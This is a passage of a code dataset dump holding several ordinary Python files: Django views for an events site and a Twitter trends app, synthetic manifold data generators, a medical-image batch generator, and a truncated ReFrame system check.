VenueForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/add_venue?submitted=True')\n\telse: \n\t\tform = VenueForm\n\t\tif 'submitted' in request.GET:\n\t\t\tsubmitted = True\n\treturn render(request, 'events/add_venue.html', {'form':form, 'submitted':submitted})\n\ndef all_events(request):\n\tevents_list = Event.objects.all()\n\treturn render(request, 'events/event_list.html',\n\t\t{'event_list': events_list})\n\ndef home(request, year=datetime.now().year, month=datetime.now().strftime('%B')):\n\tname = \"Tourist\"\n\tmonth = month.capitalize()\n\t# Convert month from name to number\n\tmonth_number = list(calendar.month_name).index(month)\n\tmonth_number = int(month_number)\n\n\t# Create calendar\n\tcal = HTMLCalendar().formatmonth(\n\t\tyear, \n\t\tmonth_number)\n\n\t# Get current year\n\tnow = datetime.now()\n\tcurrent_year = now.year\n\n\n\n\treturn render(request, \n\t\t'events/home.html', \n\t\t{\"name\": name,\n \"year\": year,\n \"month\": month,\n \"month_number\": month_number,\n \"cal\": cal,\n \"current_year\": current_year,\n\n\t\t})","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"294980908","text":"#\n# BSD 3-Clause License\n#\n# Copyright (c) 2020, Jonathan Bac\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\nimport numpy as np\nfrom sklearn.utils.validation import check_random_state\nfrom ._commonfuncs import hyperBall\n\n\ndef hyperSphere(n_points, n_dim, center=[], random_state=None):\n \"\"\"\n Generates a sample from a uniform distribution on an hypersphere surface\n \"\"\"\n random_state_ = check_random_state(random_state)\n vec = random_state_.randn(n_points, n_dim)\n vec /= np.linalg.norm(vec, axis=1)[:, None]\n return vec\n\n\ndef hyperTwinPeaks(n_points, n_dim=2, height=1, random_state=None):\n \"\"\" \n Translated from Kerstin Johnsson's R package intrinsicDimension\n \"\"\"\n random_state_ = check_random_state(random_state)\n base_coord = random_state_.uniform(size=(n_points, n_dim))\n _height = height * np.prod(np.sin(2 * np.pi * base_coord), axis=1, keepdims=1)\n return np.hstack((base_coord, _height))\n\n\ndef swissRoll3Sph(Ns, Nsph, a=1, b=2, nturn=1.5, h=4, random_state=None):\n \"\"\"\n Generates a sample from a uniform distribution on a Swiss roll-surface, \n possibly together with a sample from a uniform distribution on a 3-sphere\n inside the Swiss roll. Translated from Kerstin Johnsson's R package intrinsicDimension\n\n Parameters\n ----------\n\n Ns : int \n Number of data points on the Swiss roll.\n\n Nsph : int\n Number of data points on the 3-sphere.\n\n a : int or float, default=1\n Minimal radius of Swiss roll and radius of 3-sphere.\n\n b : int or float, default=2\n Maximal radius of Swiss roll.\n\n nturn : int or float, default=1.5\n Number of turns of the surface. \n\n h : int or float, default=4\n Height of Swiss roll.\n\n Returns\n -------\n \n np.array, (npoints x ndim)\n \"\"\"\n random_state_ = check_random_state(random_state)\n\n if Ns > 0:\n omega = 2 * np.pi * nturn\n dl = lambda r: np.sqrt(b ** 2 + omega ** 2 * (a + b * r) ** 2)\n ok = np.zeros(1)\n while sum(ok) < Ns:\n r_samp = random_state_.uniform(size=3 * Ns)\n ok = random_state_.uniform(size=3 * Ns) < dl(r_samp) / dl(1)\n\n r_samp = r_samp[ok][:Ns]\n x = (a + b * r_samp) * np.cos(omega * r_samp)\n y = (a + b * r_samp) * np.sin(omega * r_samp)\n z = random_state_.uniform(-h, h, size=Ns)\n w = np.zeros(Ns)\n\n else:\n x = y = z = w = np.array([])\n\n if Nsph > 0:\n sph = hyperSphere(Nsph, 4, random_state=random_state_) * a\n x = np.concatenate((x, sph[:, 0]))\n y = np.concatenate((y, sph[:, 1]))\n z = np.concatenate((z, sph[:, 2]))\n w = np.concatenate((w, sph[:, 3]))\n\n return np.hstack((x[:, None], y[:, None], z[:, None], w[:, None]))\n\n\ndef lineDiskBall(n_points, random_state=None):\n \"\"\" \n Generates a sample from a uniform distribution on a line, an oblong disk and an oblong ball\n Translated from ldbl function in Hideitsu Hino's package\n \"\"\"\n random_state_ = check_random_state(random_state)\n\n line = np.hstack(\n (\n np.repeat(0, 5 * n_points)[:, None],\n np.repeat(0, 5 * n_points)[:, None],\n random_state_.uniform(-0.5, 0, size=5 * n_points)[:, None],\n )\n )\n disc = np.hstack(\n (\n random_state_.uniform(-1, 1, (13 * n_points, 2)),\n np.zeros(13 * n_points)[:, None],\n )\n )\n disc = disc[~(np.sqrt(np.sum(disc ** 2, axis=1)) > 1), :]\n disc = disc[:, [0, 2, 1]]\n disc[:, 2] = disc[:, 2] - min(disc[:, 2]) + max(line[:, 2])\n\n fb = random_state_.uniform(-0.5, 0.5, size=(n_points * 100, 3))\n rmID = np.where(np.sqrt(np.sum(fb ** 2, axis=1)) > 0.5)[0]\n\n if len(rmID) > 0:\n fb = fb[~(np.sqrt(np.sum(fb ** 2, axis=1)) > 0.5), :]\n\n fb = np.hstack((fb[:, :2], fb[:, [2]] + 0.5))\n fb[:, 2] = fb[:, 2] - min(fb[:, 2]) + max(disc[:, 2])\n\n # if _sorted:\n # fb = fb[order(fb[:, 2]),:]\n\n line2 = np.hstack(\n (\n np.repeat(0, 5 * n_points)[:, None],\n np.repeat(0, 5 * n_points)[:, None],\n random_state_.uniform(-0.5, 0, size=5 * n_points)[:, None],\n )\n )\n line2[:, 2] = line2[:, 2] - min(line2[:, 2]) + max(fb[:, 2])\n lineID = np.repeat(1, len(line))\n discID = np.repeat(2, len(disc))\n fbID = np.repeat(3, len(fb))\n line2ID = np.repeat(1, len(line2))\n x = np.vstack((line, disc, fb, line2))\n useID = np.sort(random_state_.choice(len(x), n_points, replace=False))\n x = x[useID, :]\n\n return x, np.concatenate((lineID, discID, fbID, line2ID), axis=0)[useID]\n\n\n### Hein manifolds\n\n\nclass DataGenerator:\n # modified from https://github.com/stat-ml/GeoMLE\n # Original licence citation:\n # MIT License\n #\n # Copyright (c) 2019 Mokrov Nikita, Marina Gomtsyan, Maxim Panov and Yury Yanovich\n #\n # Permission is hereby granted, free of charge, to any person obtaining a copy\n # of this software and associated documentation files (the \"Software\"), to deal\n # in the Software without restriction, including without limitation the rights\n # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n # copies of the Software, and to permit persons to whom the Software is\n # furnished to do so, subject to the following conditions:\n #\n # The above copyright notice and this permission notice shall be included in all\n # copies or substantial portions of the Software.\n #\n # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n # SOFTWARE.\n\n def __init__(self, random_state: int = None, type_noise: str = \"norm\"):\n\n self.set_rng(random_state)\n self.set_gen_noise(type_noise)\n self.dict_gen = {\n # synthetic data\n \"Helix1d\": gen_helix1_data,\n \"Helix2d\": gen_helix2_data,\n \"Helicoid\": gen_helicoid_data,\n \"Spiral\": gen_spiral_data,\n \"Roll\": gen_roll_data,\n \"Scurve\": gen_scurve_data,\n \"Star\": gen_star_data,\n \"Moebius\": gen_moebius_data,\n \"Sphere\": gen_sphere_data,\n \"Norm\": gen_norm_data,\n \"Uniform\": gen_uniform_data,\n \"Cubic\": gen_cubic_data,\n \"Affine_3to5\": gen_affine3_5_data,\n \"Affine\": gen_affine_data,\n \"Nonlinear_4to6\": gen_nonlinear4_6_data,\n \"Nonlinear\": gen_nonlinear_data,\n \"Paraboloid\": gen_paraboloid_data,\n }\n\n def set_rng(self, random_state: int = None):\n if random_state is not None:\n np.random.seed(random_state)\n\n def set_gen_noise(self, type_noise: str):\n if not hasattr(self, \"rng\"):\n self.set_rng()\n if type_noise == \"norm\":\n self.gen_noise = np.random.randn\n if type_noise == \"uniform\":\n self.gen_noise = lambda n, dim: np.random.rand(n, dim) - 0.5\n\n def gen_data(\n self,\n name: str,\n n: int,\n dim: int,\n d: int,\n type_sample: str = \"uniform\",\n noise: float = 0.0,\n ):\n # Parameters:\n # --------------------\n # name: string\n # Type of generetic data\n # n: int\n # The number of sample points\n # dim: int\n # The dimension of point\n # d: int\n # The hyperplane dimension\n # noise: float, optional(default=0.0)\n # The value of noise in data\n\n # Returns:\n # data: pd.Dataframe of shape (n, dim)\n # The points\n assert name in self.dict_gen.keys(), \"Name of data is unknown\"\n if type_sample == \"uniform\":\n if name == \"Sphere\":\n sampler = np.random.randn\n else:\n sampler = np.random.rand\n elif type_sample == \"nonuniform\":\n if name == \"Sphere\":\n sampler = uniform_sampler\n else:\n sampler = bound_nonuniform_sampler\n else:\n assert False, \"Check type_sample\"\n\n data = self.dict_gen[name](n=n, dim=dim, d=d, sampler=sampler)\n noise = self.gen_noise(n, dim) * noise\n\n return data + noise\n\n\ndef bound_nonuniform_sampler(*args):\n x = np.random.randn(*args) * 0.1 + 0.5\n x[x < 0] = -x[x < 0]\n x[x > 1] = x[x > 1] - 1\n x[x < 0] = -x[x < 0]\n return x\n\n\ndef uniform_sampler(*args):\n x = np.random.rand(*args)\n x = (x - 0.5) * 3\n return x\n\n\ndef gen_spiral_data(n, dim, d, sampler):\n assert d < dim\n assert d == 1\n assert dim >= 3\n t = 10 * np.pi * sampler(n)\n data = np.vstack([100 * np.cos(t), 100 * np.sin(t), t, np.zeros((dim - 3, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_helix1_data(n, dim, d, sampler):\n assert d < dim\n assert d == 1\n assert dim >= 3\n t = 2 * np.pi / n + sampler(n) * 2 * np.pi\n data = np.vstack(\n [\n (2 + np.cos(8 * t)) * np.cos(t),\n (2 + np.cos(8 * t)) * np.sin(t),\n np.sin(8 * t),\n np.zeros((dim - 3, n)),\n ]\n ).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_helix2_data(n, dim, d, sampler):\n assert d < dim\n assert d == 2\n assert dim >= 3\n r = 10 * np.pi * sampler(n)\n p = 10 * np.pi * sampler(n)\n data = np.vstack([r * np.cos(p), r * np.sin(p), 0.5 * p, np.zeros((dim - 3, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_helicoid_data(n, dim, d, sampler):\n assert d <= dim\n assert d == 2\n assert dim >= 3\n u = 2 * np.pi / n + sampler(n) * 2 * np.pi\n v = 5 * np.pi * sampler(n)\n data = np.vstack([np.cos(v), np.sin(v) * np.cos(v), u, np.zeros((dim - 3, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_roll_data(n, dim, d, sampler):\n assert d < dim\n assert dim >= 3\n assert d == 2\n t = 1.5 * np.pi * (1 + 2 * sampler(n))\n p = 21 * sampler(n)\n\n data = np.vstack([t * np.cos(t), p, t * np.sin(t), np.zeros((dim - d - 1, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_scurve_data(n, dim, d, sampler):\n assert d < dim\n assert dim >= 3\n assert d == 2\n t = 3 * np.pi * (sampler(n) - 0.5)\n p = 2.0 * sampler(n)\n\n data = np.vstack(\n [np.sin(t), p, np.sign(t) * (np.cos(t) - 1), np.zeros((dim - d - 1, n))]\n ).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_sphere_data(n, dim, d, sampler):\n assert d < dim\n # V = np.random.randn(n, d + 1)\n V = sampler(n, d + 1)\n data = np.hstack(\n [V / np.sqrt((V ** 2).sum(axis=1))[:, None], np.zeros((n, dim - d - 1))]\n )\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_norm_data(n, dim, d, sampler):\n assert d <= dim\n norm_xyz = np.random.multivariate_normal(np.zeros(d), np.identity(d), n)\n data = np.hstack([norm_xyz, np.zeros((n, dim - d))])\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_uniform_data(n, dim, d, sampler):\n assert d <= dim\n uniform_xyz = np.random.uniform(size=(n, d))\n data = np.hstack([uniform_xyz, np.zeros((n, dim - d))])\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_cubic_data(n, dim, d, sampler):\n assert d < dim\n cubic_data = np.array([[]] * (d + 1))\n for i in range(d + 1):\n n_once = int(n / (2 * (d + 1)) + 1)\n # 1st side\n data_once = sampler(d + 1, n_once)\n data_once[i] = 0\n cubic_data = np.hstack([cubic_data, data_once])\n # 2nd side\n data_once = sampler(d + 1, n_once)\n data_once[i] = 1\n cubic_data = np.hstack([cubic_data, data_once])\n cubic_data = cubic_data.T[:n]\n data = np.hstack([cubic_data, np.zeros((n, dim - d - 1))])\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_moebius_data(n, dim, d, sampler):\n assert dim == 3\n assert d == 2\n\n phi = sampler(n) * 2 * np.pi\n rad = sampler(n) * 2 - 1\n data = np.vstack(\n [\n (1 + 0.5 * rad * np.cos(5.0 * phi)) * np.cos(phi),\n (1 + 0.5 * rad * np.cos(5.0 * phi)) * np.sin(phi),\n 0.5 * rad * np.sin(5.0 * phi),\n ]\n ).T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_affine_data(n, dim, d, sampler):\n assert dim >= d\n\n p = sampler(d, n) * 5 - 2.5\n v = np.eye(dim, d)\n # v = np.random.randint(0, 10, (dim, d))\n data = v.dot(p).T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_affine3_5_data(n, dim, d, sampler):\n assert dim == 5\n assert d == 3\n\n p = 4 * sampler(d, n)\n A = np.array(\n [\n [1.2, -0.5, 0],\n [0.5, 0.9, 0],\n [-0.5, -0.2, 1],\n [0.4, -0.9, -0.1],\n [1.1, -0.3, 0],\n ]\n )\n b = np.array([[3, -1, 0, 0, 8]]).T\n data = A.dot(p) + b\n data = data.T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_nonlinear4_6_data(n, dim, d, sampler):\n assert dim == 6\n assert d == 4\n\n p0, p1, p2, p3 = sampler(d, n)\n data = np.vstack(\n [\n p1 ** 2 * np.cos(2 * np.pi * p0),\n p2 ** 2 * np.sin(2 * np.pi * p0),\n p1 + p2 + (p1 - p3) ** 2,\n p1 - 2 * p2 + (p0 - p3) ** 2,\n -p1 - 2 * p2 + (p2 - p3) ** 2,\n p0 ** 2 - p1 ** 2 + p2 ** 2 - p3 ** 2,\n ]\n ).T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_nonlinear_data(n, dim, d, sampler):\n assert dim >= d\n m = int(dim / (2 * d))\n assert dim == 2 * m * d\n\n p = sampler(d, n)\n F = np.zeros((2 * d, n))\n F[0::2, :] = np.cos(2 * np.pi * p)\n F[1::2, :] = np.sin(2 * np.pi * p)\n R = np.zeros((2 * d, n))\n R[0::2, :] = np.vstack([p[1:], p[0]])\n R[1::2, :] = np.vstack([p[1:], p[0]])\n D = (R * F).T\n data = np.hstack([D] * m)\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_paraboloid_data(n, dim, d, sampler):\n assert dim == 3 * (d + 1)\n\n E = np.random.exponential(1, (d + 1, n))\n X = ((1 + E[1:] / E[0]) ** -1).T\n X = np.hstack([X, (X ** 2).sum(axis=1)[:, np.newaxis]])\n data = np.hstack([X, np.sin(X), X ** 2])\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_star_data(n, dim, d, sampler):\n assert dim >= d\n assert d == 1\n assert dim >= 2\n\n t = np.pi - sampler(n) * 2 * np.pi\n omega = 5\n data = np.concatenate(\n (\n ((1 + 0.3 * np.cos(omega * t)) * np.cos(t)).reshape(-1, 1),\n ((1 + 0.3 * np.cos(omega * t)) * np.sin(t)).reshape(-1, 1),\n np.zeros((n, dim - 2)),\n ),\n axis=1,\n )\n\n assert data.shape == (n, dim)\n return data\n\n","sub_path":"skdim/gendata.py","file_name":"gendata.py","file_ext":"py","file_size_in_byte":16404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"391873138","text":"from django.shortcuts import render\nfrom .forms import *\nfrom .twitter_credentials import *\nimport tweepy\nfrom geopy import Nominatim\n\n\"\"\"\nThis app is used for authentication and filtering Tweets based on the user-input on the home-page. \nAnd searching for Trends based on User-Input in Location Form. \n\"\"\"\n\n\nclass TwitterAuthenticator:\n \"\"\"\n Class to authenticate based on entries in twitter_credentials.\n \"\"\"\n def authenticate_twitter_app(self):\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n return auth\n\n\nclass TwitterClient:\n \"\"\"\n Uses Authenticator Class to pull tweets based on user input.\n \"\"\"\n def __init__(self):\n self.auth = TwitterAuthenticator().authenticate_twitter_app()\n self.twitter_client = tweepy.API(self.auth)\n\n def get_twitter_client_api(self):\n return self.twitter_client\n\n def get_tweets(self, request):\n input_hashtag = request.POST['input_hashtag']\n input_num = int(request.POST['input_num'])\n twitter_client = TwitterClient()\n api = twitter_client.get_twitter_client_api()\n tweets = [status for status in tweepy.Cursor(api.search, q=input_hashtag).items(input_num)]\n return tweets\n\n\n\"\"\"\nDisplays the home.html and forms where the user can input their hashtag, number of Tweets and location.\n\"\"\"\n\n\ndef home(request):\n hashtag_form = HashtagForm()\n num_form = NumForm()\n location = LocationForm()\n\n # Checks whether location was submitted and renders the result, otherwise just displays standard home.html\n if request.POST.get(\"input_location\") != None:\n input_location = request.POST.get(\"input_location\")\n geolocator = Nominatim(user_agent=\"TweetAnalyser\")\n # Looks for location based on input\n loc = geolocator.geocode(input_location)\n twitter_client = TwitterClient()\n api = twitter_client.get_twitter_client_api()\n location_data = api.trends_closest(loc.latitude, loc.longitude)\n # Where on earth ID based on Tweets\n woeid = location_data[0][\"woeid\"]\n # List of top 10\n top10_trends = []\n try:\n trends_results = api.trends_place(woeid)\n for trend in trends_results[0][\"trends\"][:10]:\n top10_trends.append(trend[\"name\"])\n except tweepy.error.TweepError:\n return render(request, 'home.html', {'hashtag_form': hashtag_form, \"num_form\": num_form, 'location': location})\n return render(request, 'home.html', {'hashtag_form': hashtag_form, \"num_form\": num_form, 'location': location,\n 'input_location': input_location, 'top10_trends': top10_trends})\n else:\n return render(request, 'home.html', {'hashtag_form': hashtag_form, \"num_form\": num_form, 'location': location})\n","sub_path":"TSentimentAnalyser/App_TwitterDataCollector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"385867934","text":"import os, sys\nsys.path.append('../')\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom base_info import *\n\n\nclass BatchGenerator:\n\tdef __init__(self):\n\t\tself.read_CSVs()\n\t\tself.shuffle_CSVs()\n\n\n\tdef read_CSVs(self):\n\t\tself.CSV_TRAIN = pd.read_csv(PATH_CSV_TRAIN)\n\t\tself.CSV_TEST = pd.read_csv(PATH_CSV_TEST)\n\t\n\n\tdef shuffle_CSVs(self):\n\t\t''' Shuffle the CSV using the random_seed '''\n\t\trandom_seed = np.random.randint(0, 10000)\n\t\tnp.random.seed(seed=random_seed)\n\t\tself.CSV_TRAIN = self.CSV_TRAIN.reindex(np.random.permutation(self.CSV_TRAIN.index))\n\t\tself.CSV_TRAIN = self.CSV_TRAIN.reset_index()\n\t\tself.CSV_TEST = self.CSV_TEST.reindex(np.random.permutation(self.CSV_TEST.index))\n\t\tself.CSV_TEST = self.CSV_TEST.reset_index()\n\n\tdef store_data_by_score(self):\n\t\tscore_1 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 1]\n\t\tdel score_1['index']\n\t\tdel score_1['Unnamed: 0']\t\n\t\t\n\t\tscore_2 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 2]\n\t\tdel score_2['index']\n\t\tdel score_2['Unnamed: 0']\t\n\t\t\n\t\tscore_3 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 3]\n\t\tdel score_3['index']\n\t\tdel score_3['Unnamed: 0']\t\n\t\t\n\t\tscore_4 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 4]\n\t\tdel score_4['index']\n\t\tdel score_4['Unnamed: 0']\t\n\t\t\n\t\tscore_1_data = []\n\t\tscore_1_masks = []\n\t\tfor item in score_1['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_1_data.append(im)\n\t\t\tscore_1_masks.append(mask)\n\t\t\n\t\tscore_2_data = []\n\t\tscore_2_masks = []\n\t\tfor item in score_2['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_2_data.append(im)\n\t\t\tscore_2_masks.append(mask)\n\t\t\n\t\tscore_3_data = []\n\t\tscore_3_masks = []\n\t\tfor item in score_3['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_3_data.append(im)\n\t\t\tscore_3_masks.append(mask)\n\t\t\n\t\tscore_4_data = []\n\t\tscore_4_masks = []\n\t\tfor item in score_4['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_4_data.append(im)\n\t\t\tscore_4_masks.append(mask)\n\t\t\n\t\t# creating numpy array for all\n\t\tscore_1_data = np.array(score_1_data)\n\t\tscore_1_masks = np.array(score_1_masks)\n\t\tscore_2_data = np.array(score_2_data)\n\t\tscore_2_masks = np.array(score_2_masks)\n\t\tscore_3_data = np.array(score_3_data)\n\t\tscore_3_masks = np.array(score_3_masks)\n\t\tscore_4_data = np.array(score_4_data)\n\t\tscore_4_masks = np.array(score_4_masks)\n\t\t\n\t\t# Storing the numpy arrays to disk for faster retreival afterwards instread of image by image\t\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_1, 'im.npy'), score_1_data)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_2, 'im.npy'), score_2_data)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_3, 'im.npy'), score_3_data)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_4, 'im.npy'), score_4_data)\n\t\t\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_1, 'labels.npy'), score_1_masks)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_2, 'labels.npy'), score_2_masks)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_3, 'labels.npy'), score_3_masks)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_4, 'labels.npy'), score_4_masks)\n\n\t\n\tdef convert_img_to_one_hot_encoded(self, im):\n\t\th, w = im.shape\n\t\tone_hot = np.zeros([h, w, 2])\n\t\tone_hot_p = np.zeros([h, w])\n\t\tone_hot_n = np.zeros([h, w])\n\t\tone_hot_p[im == 255] = 1\n\t\tone_hot_n[im == 255] = 1\n\t\tone_hot[:, :, 0] = one_hot_p\n\t\tone_hot[:, :, 1] = one_hot_n\n\t\treturn np.array(one_hot).astype(np.float32)\t\t\n\n\n\tdef get_inp_image(self, data, channel=-1):\n\t\tpath = os.path.join(PATH_ROOT, '{}/Perio_Frame/{}.png'.format(data.split('_')[0], data.split('_')[-1]))\n\t\tim = np.array(cv2.imread(path))\n\t\tim = cv2.GaussianBlur(im, (7, 7), 1.0)\n\t\tif channel == -1: # 3 channel\n\t\t\treturn im\n\t\telse:\n\t\t\treturn im[:, :, channel]\n\t\n\t\n\tdef get_ground_truth_image(self, data):\n\t\tpath = os.path.join(PATH_ROOT, '{}/masks2/{}.png'.format(data.split('_')[0], data.split('_')[-1]))\n\t\treturn np.array(cv2.imread(path, 0))\n\t\n\n\tdef batch_generator(self):\n\t\tfor i in range(0, len(self.CSV_TRAIN), TRAIN_BATCH_SIZE):\n\t\t\tbatch_csv = self.CSV_TRAIN[i: i+TRAIN_BATCH_SIZE]\n\t\t\tbatch_csv = self.CSV_TRAIN.reset_index()\n\n\t\t\tXY = batch_csv['patient_frame']\n\t\t\tS = batch_csv['score_l']\n\n\t\t\tbatch_X = []\n\t\t\tbatch_Y = []\n\t\t\tbatch_S = []\n\t\t\t\n\t\t\ttry:\n\t\t\t\tfor j in range(TRAIN_BATCH_SIZE):\n\t\t\t\t\t_channel = -1 if N_CHANNELS_IN == 3 else 0\n\t\t\t\t\tx = self.get_inp_image(XY[j], channel=_channel) # blue channel == 0\n\t\t\t\t\ty = self.get_ground_truth_image(XY[j])\n\t\t\t\t\ts = int(S[j])\n\n\t\t\t\t\tbatch_X.append(x)\n\t\t\t\t\tbatch_Y.append(y)\n\t\t\t\t\tbatch_S.append(s)\n\n\t\t\t\tif N_CHANNELS_IN == 3:\n\t\t\t\t\tbatch_X = np.array(batch_X).astype(np.float32)\n\t\t\t\telse:\n\t\t\t\t\tbatch_X = np.expand_dims(np.array(batch_X).astype(np.float32), -1)\n\t\t\t\tbatch_Y = np.expand_dims(np.array(batch_Y).astype(np.float32), -1)\n\t\t\t\tbatch_S = np.array(batch_S).astype(np.int32)\n\t\t\t\t# print('{}\\t{}\\t{}'.format(batch_X.shape, batch_Y.shape, batch_S.shape))\n\t\t\t\t\n\t\t\t\tyield batch_X, batch_Y, batch_S\n\n\t\t\texcept:\n\t\t\t\tprint('Error while generating batch !! Check')\n\t\t\t\treturn\n\n\n\tdef get_test_dataset(self):\n\t\tX = []\n\t\tY = []\n\t\tS = []\n\t\t\n\t\tfor i in range(len(self.CSV_TEST)):\n\t\t\tXY = self.CSV_TEST['patient_frame'][i]\n\t\t\t_S = self.CSV_TEST['score_l'][i]\n\t\t\t\t\t\t\n\t\t\ttry:\n\t\t\t\t_channel = -1 if N_CHANNELS_IN == 3 else 0\n\t\t\t\tx = self.get_inp_image(XY, channel=_channel)\n\t\t\t\ty = self.get_ground_truth_image(XY)\n\t\t\t\ts = int(_S)\n\t\t\t\t\n\t\t\t\tX.append(x)\n\t\t\t\tY.append(y)\n\t\t\t\tS.append(s)\n\t\n\t\t\texcept:\n\t\t\t\tprint('Error!! Check')\n\t\t\t\treturn\n\t\t\t\t\n\t\tif N_CHANNELS_IN == 3:\n\t\t\tX = np.array(X).astype(np.float32)\n\t\telse:\n\t\t\tX = np.expand_dims(np.array(X).astype(np.float32), -1)\n\t\tY = np.expand_dims(np.array(Y).astype(np.float32), -1)\n\t\tS = np.array(S).astype(np.int32)\n\t\t\n\t\treturn X, Y, S\n\t\t\t\t\n\n\nif __name__ == '__main__':\n\tgen = BatchGenerator()\n\tgen.store_data_by_score()\n\t'''\n\tprint('-'*100)\n\ta, b, c = gen.next()\n\tprint(a.max())\n\tprint(b.max())\n\tprint(c.max())\n\t\n\ta = np.load(os.path.join(PATH_DATA_SCORE_1, '1.npy'))\n\tprint(a.shape)\n\tb = np.load(os.path.join(PATH_DATA_SCORE_2, '2.npy'))\n\tprint(b.shape)\n\tc = np.load(os.path.join(PATH_DATA_SCORE_3, '3.npy'))\n\tprint(c.shape)\n\td = np.load(os.path.join(PATH_DATA_SCORE_4, '4.npy'))\n\tprint(d.shape)\n\t'''\n","sub_path":"Controller/create_and_store_bins.py","file_name":"create_and_store_bins.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"624962724","text":"import os\nimport reframe.utility.sanity as sn\n\nfrom reframe.core.pipeline import RunOnlyRegressionTest\n\n\nclass SbucheckCommandCheck(RunOnlyRegressionTest):\n def __init__(self, **kwargs):\n super().__init__('slurm_cscs_usertools_sbucheck',\n os.path.dirname(__file__), **kwargs)\n self.valid_systems = ['daint:login', 'dom:login']\n self.descr = 'Slurm CSCS usertools sbucheck'\n self.executable = 'sbucheck'\n self.valid_prog_environs = ['PrgEnv-cray']\n self.num_tasks = 1\n self.num_tasks_per_node = 1\n self.tags = {'cscs_usertools', 'production',\n 'maintenance', 'single-node', 'ops'}\n self.sanity_patterns = sn.assert_found(\n r'Per-project usage at CSCS since', 